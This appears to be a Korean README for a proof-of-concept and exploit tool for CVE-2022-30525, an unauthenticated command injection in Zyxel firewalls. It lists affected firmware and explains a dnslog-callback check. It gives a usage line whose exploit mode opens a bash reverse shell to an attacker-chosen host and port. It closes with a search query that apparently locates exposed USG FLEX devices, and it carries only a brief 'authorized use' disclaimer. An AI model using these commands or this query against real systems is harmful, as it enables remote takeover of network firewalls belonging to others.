
CVE-2022-30525 Zyxel 방화벽 명령 주입 취약점 POC&EXPC
CVE-2022-30525 POC&EXP
작성자:160team.west9B
승인된 상태에서 보안 연구원만 사용하도록 제한됩니다. 사이버 보안법을 준수하십시오. 발생하는 모든 문제에 대한 책임은 사용자 본인에게 있으며 작성자와 무관합니다.
2022년 5월 12일, Zyxel(合勤)은 방화벽 장치에서 인증되지 않은 원격 명령 주입 취약점(CVE-2022-30525)을 수정하는 보안 공지를 발표했습니다. 이 취약점의 CVSS 점수는 9.8입니다. 이 취약점은 일부 Zyxel 방화벽 버전의 CGI 프로그램에 존재하며, 인증 없이 영향을 받는 장치에서 임의의 명령을 실행할 수 있습니다.
영향 범위:
ATP 시리즈 펌웨어: 5.10-5.21 Patch 1
VPN 시리즈 펌웨어: 4.60-5.21 Patch 1
USG FLEX 100(W), 200, 500, 700: 5.00-5.21 Patch 1
USG FLEX 50(W)/USG20(W)-VPN: 5.10-5.21 Patch 1
이 취약점은 명령 실행 결과를 반환하지 않으므로, POC는 dnslog API에 검증 요청을 보냅니다. dnslog에 요청이 있으면 취약점이 존재하는 것입니다. 네트워크 지연으로 인한 오탐을 방지하기 위해 DNSLOG 검증 요청은 10초 지연됩니다.
usage_poc: ./cve-2022-30525 -m poc -u https://192.168.1.1/
exp는 bash 리버스 셸입니다. -m exp 뒤에 vps ip와 포트를 지정하십시오.
**usage_exp:./cve-2022-30525 -m exp -u https://192.168.1.1/ -lhost 192.168.1.2 -lport 1337 **

title="USG FLEX xx"